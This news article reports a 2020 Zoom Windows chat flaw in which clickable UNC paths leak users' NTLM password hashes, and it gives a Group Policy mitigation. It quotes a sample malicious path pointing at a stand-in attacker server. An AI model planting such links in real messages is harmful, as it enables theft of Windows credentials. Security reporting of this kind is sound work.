Zoom use has been exploding during the COVID-19 crisis as an increasing number of people work from home. But as more people flock to the video conferencing service for business meetings or chats, security and privacy issues are quickly emerging.
Today, news of a Zoom issue affecting Microsoft Windows users. The Zoom Windows client is at risk from a flaw in the chat feature that could allow attackers to steal the logins of people who click on a link, according to tech site Bleeping Computer.
When using Zoom, it’s possible for people to communicate with each other via text message in a chat interface. When a chat message is sent containing a URL, this is converted into a hyperlink that others can click on to open a webpage in their browser.
But the Zoom client apparently also turns Windows networking Universal Naming Convention (UNC) paths into a clickable link in the chat messages, security researcher @_g0dmode has found.
Ok, so what’s the problem?
Bleeping Computer demonstrated how regular URL and the UNC path of \\evil.server.com\images\cat.jpg were both converted into a clickable link in the chat message.
The problem with this is, according to Bleeping Computer: “When a user clicks on a UNC path link, Windows will attempt to connect to a remote site using the SMB file sharing protocol to open the remote cat.jpg file.” And at the same time, by default, Windows sends a user’s login name and NTLM password hash. This can be cracked fairly easily by an attacker to reveal your password.
Security researcher Matthew Hickey posted an example of exploiting the Zoom Windows client using UNC path injection on Twitter.
Zoom told me that “ensuring the privacy and security of our users and their data is paramount.”
A spokesperson added: “We are aware of the UNC issue and are working to address it.”
What to do, until Zoom issues a fix
The issue needs to be fixed by Zoom but until then, you can enable a group policy that prevents NTML credentials from automatically being sent as described. You can find this under Group Policy editor, and change it to “Deny All.”
Go to Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options > Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers.
Numerous Zoom problems
It comes as numerous Zoom privacy problems emerge, a surge in so called “Zoom bombers”, and news that the app is not end-to-end encrypted.
Ian Thornton Trump, chief security officer at Cyjax says that as more people use the video conferencing app amid the COVID-19 crisis, security problems are going to be a growing pain issue for Zoom. “I think the success story for them is they were able to scale to meet demand and they have been responsive to fixing issues–once they have been identified–quickly. The good news story is Zoom is battle tested and it will be a great solution and a global standard in the months to come.”
But for now security and privacy issues persist, and it’s left many people looking for an alternative. Security researcher Sean Wright says he could not recommend Zoom for sensitive calls and conversations. “Hopefully Zoom will take a long hard look and address this issue as well as putting in the effort to ensure that its product is secure.”
Wright recommends using a service such as Signal for private calls and I have to agree.
But Signal isn’t great for larger groups, so you might want to stick to something like Microsoft Teams if you are a business, while FaceTime could work for all types of users–as long as you have access to an Apple device.
O’Flattery, Kate. “Zoom User Warning: This is How Hackers Can Steal WindowsPasswords” Forbes.com April 1, 2020